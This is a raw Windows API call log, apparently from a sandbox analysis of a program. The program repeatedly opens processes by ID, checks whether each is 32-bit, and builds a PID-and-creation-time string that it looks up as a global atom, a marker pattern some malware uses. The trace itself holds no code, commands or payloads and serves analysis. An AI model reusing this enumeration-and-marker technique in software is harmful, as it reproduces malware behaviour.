	[0100.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0100.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2d4
	[0100.291] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.291] CloseHandle (hObject=0x2d4) returned 1
	[0100.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2d4
	[0100.291] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.291] CloseHandle (hObject=0x2d4) returned 1
	[0100.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0100.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0100.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0100.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0100.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0100.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0100.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0100.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0100.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0100.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0100.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0100.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0100.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0100.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0100.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0100.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0100.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0100.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0100.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2d4
	[0100.359] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.359] CloseHandle (hObject=0x2d4) returned 1
	[0100.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0100.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0100.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2d4
	[0100.359] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.359] CloseHandle (hObject=0x2d4) returned 1
	[0100.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0100.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2d4
	[0100.360] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.360] CloseHandle (hObject=0x2d4) returned 1
	[0100.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2d4
	[0100.360] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.360] CloseHandle (hObject=0x2d4) returned 1
	[0100.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2d4
	[0100.360] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.360] CloseHandle (hObject=0x2d4) returned 1
	[0100.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2d4
	[0100.360] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.360] CloseHandle (hObject=0x2d4) returned 1
	[0100.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2d4
	[0100.360] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.360] CloseHandle (hObject=0x2d4) returned 1
	[0100.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2d4
	[0100.361] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.361] CloseHandle (hObject=0x2d4) returned 1
	[0100.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0100.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2d4
	[0100.393] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.393] CloseHandle (hObject=0x2d4) returned 1
	[0100.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2d4
	[0100.393] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.393] CloseHandle (hObject=0x2d4) returned 1
	[0100.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x2d4
	[0100.397] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.397] CloseHandle (hObject=0x2d4) returned 1
	[0100.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2d4
	[0100.398] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.398] CloseHandle (hObject=0x2d4) returned 1
	[0100.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2d4
	[0100.398] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.398] CloseHandle (hObject=0x2d4) returned 1
	[0100.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2d4
	[0100.398] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.398] CloseHandle (hObject=0x2d4) returned 1
	[0100.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2d4
	[0100.398] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.399] CloseHandle (hObject=0x2d4) returned 1
	[0100.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2d4
	[0100.399] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.399] CloseHandle (hObject=0x2d4) returned 1
	[0100.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2d4
	[0100.399] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.399] CloseHandle (hObject=0x2d4) returned 1
	[0100.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2d4
	[0100.400] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.400] CloseHandle (hObject=0x2d4) returned 1
	[0100.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2d4
	[0100.400] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.400] CloseHandle (hObject=0x2d4) returned 1
	[0100.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2d4
	[0100.400] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.400] CloseHandle (hObject=0x2d4) returned 1
	[0100.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2d4
	[0100.400] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.400] CloseHandle (hObject=0x2d4) returned 1
	[0100.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2d4
	[0100.400] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.400] CloseHandle (hObject=0x2d4) returned 1
	[0100.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2d4
	[0100.401] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.401] CloseHandle (hObject=0x2d4) returned 1
	[0100.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2d4
	[0100.401] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.401] CloseHandle (hObject=0x2d4) returned 1
	[0100.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2d4
	[0100.401] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.401] CloseHandle (hObject=0x2d4) returned 1
	[0100.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2d4
	[0100.402] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.402] CloseHandle (hObject=0x2d4) returned 1
	[0100.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2d4
	[0100.402] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.402] CloseHandle (hObject=0x2d4) returned 1
	[0100.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2d4
	[0100.402] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.402] CloseHandle (hObject=0x2d4) returned 1
	[0100.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2d4
	[0100.402] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.402] CloseHandle (hObject=0x2d4) returned 1
	[0100.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2d4
	[0100.402] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.403] CloseHandle (hObject=0x2d4) returned 1
	[0100.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2d4
	[0100.403] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.403] CloseHandle (hObject=0x2d4) returned 1
	[0100.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2d4
	[0100.403] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.403] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0100.403] GetProcessTimes (in: hProcess=0x2d4, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0100.404] wsprintfA (in: param_1=0x6810f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0100.405] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.405] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0100.405] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.405] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0100.405] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0100.405] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0100.406] CloseHandle (hObject=0x2d4) returned 1
	[0100.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0100.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2d4
	[0100.406] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.406] CloseHandle (hObject=0x2d4) returned 1
	[0100.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2d4
	[0100.406] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.406] CloseHandle (hObject=0x2d4) returned 1
	[0100.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0100.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0100.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0100.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0100.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0100.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0100.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0100.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0100.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0100.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0100.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0100.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0100.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0100.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0100.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0100.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0100.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0100.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0100.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3b4
	[0100.528] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.528] CloseHandle (hObject=0x3b4) returned 1
	[0100.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0100.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0100.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3b4
	[0100.529] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.529] CloseHandle (hObject=0x3b4) returned 1
	[0100.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0100.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3b4
	[0100.529] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.529] CloseHandle (hObject=0x3b4) returned 1
	[0100.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3b4
	[0100.529] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.529] CloseHandle (hObject=0x3b4) returned 1
	[0100.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3b4
	[0100.529] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.529] CloseHandle (hObject=0x3b4) returned 1
	[0100.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3b4
	[0100.529] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.530] CloseHandle (hObject=0x3b4) returned 1
	[0100.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3b4
	[0100.530] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.530] CloseHandle (hObject=0x3b4) returned 1
	[0100.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3b4
	[0100.530] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.530] CloseHandle (hObject=0x3b4) returned 1
	[0100.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0100.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3b4
	[0100.530] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.530] CloseHandle (hObject=0x3b4) returned 1
	[0100.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3b4
	[0100.530] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.531] CloseHandle (hObject=0x3b4) returned 1
	[0100.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3b4
	[0100.531] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.531] CloseHandle (hObject=0x3b4) returned 1
	[0100.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3b4
	[0100.531] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.531] CloseHandle (hObject=0x3b4) returned 1
	[0100.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3b4
	[0100.531] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.531] CloseHandle (hObject=0x3b4) returned 1
	[0100.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3b4
	[0100.531] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.531] CloseHandle (hObject=0x3b4) returned 1
	[0100.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3b4
	[0100.531] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.531] CloseHandle (hObject=0x3b4) returned 1
	[0100.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3b4
	[0100.532] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.532] CloseHandle (hObject=0x3b4) returned 1
	[0100.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3b4
	[0100.532] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.532] CloseHandle (hObject=0x3b4) returned 1
	[0100.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3b4
	[0100.532] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.532] CloseHandle (hObject=0x3b4) returned 1
	[0100.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3b4
	[0100.532] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.532] CloseHandle (hObject=0x3b4) returned 1
	[0100.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3b4
	[0100.532] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.532] CloseHandle (hObject=0x3b4) returned 1
	[0100.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3b4
	[0100.533] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.533] CloseHandle (hObject=0x3b4) returned 1
	[0100.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3b4
	[0100.533] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.533] CloseHandle (hObject=0x3b4) returned 1
	[0100.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3b4
	[0100.533] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.533] CloseHandle (hObject=0x3b4) returned 1
	[0100.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3b4
	[0100.533] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.533] CloseHandle (hObject=0x3b4) returned 1
	[0100.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3b4
	[0100.533] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.533] CloseHandle (hObject=0x3b4) returned 1
	[0100.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3b4
	[0100.534] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.534] CloseHandle (hObject=0x3b4) returned 1
	[0100.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3b4
	[0100.534] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.534] CloseHandle (hObject=0x3b4) returned 1
	[0100.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3b4
	[0100.534] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.534] CloseHandle (hObject=0x3b4) returned 1
	[0100.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3b4
	[0100.534] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.534] CloseHandle (hObject=0x3b4) returned 1
	[0100.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3b4
	[0100.534] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.534] CloseHandle (hObject=0x3b4) returned 1
	[0100.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3b4
	[0100.535] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.535] CloseHandle (hObject=0x3b4) returned 1
	[0100.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3b4
	[0100.535] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.535] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0100.535] GetProcessTimes (in: hProcess=0x3b4, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0100.535] wsprintfA (in: param_1=0x684480, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0100.536] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.536] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0100.536] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.536] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0100.536] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0100.536] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0100.536] CloseHandle (hObject=0x3b4) returned 1
	[0100.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0100.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x3b4
	[0100.537] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.537] CloseHandle (hObject=0x3b4) returned 1
	[0100.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x3b4
	[0100.537] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.537] CloseHandle (hObject=0x3b4) returned 1
	[0100.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0100.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0100.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0100.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0100.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0100.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0100.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0100.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0100.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0100.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
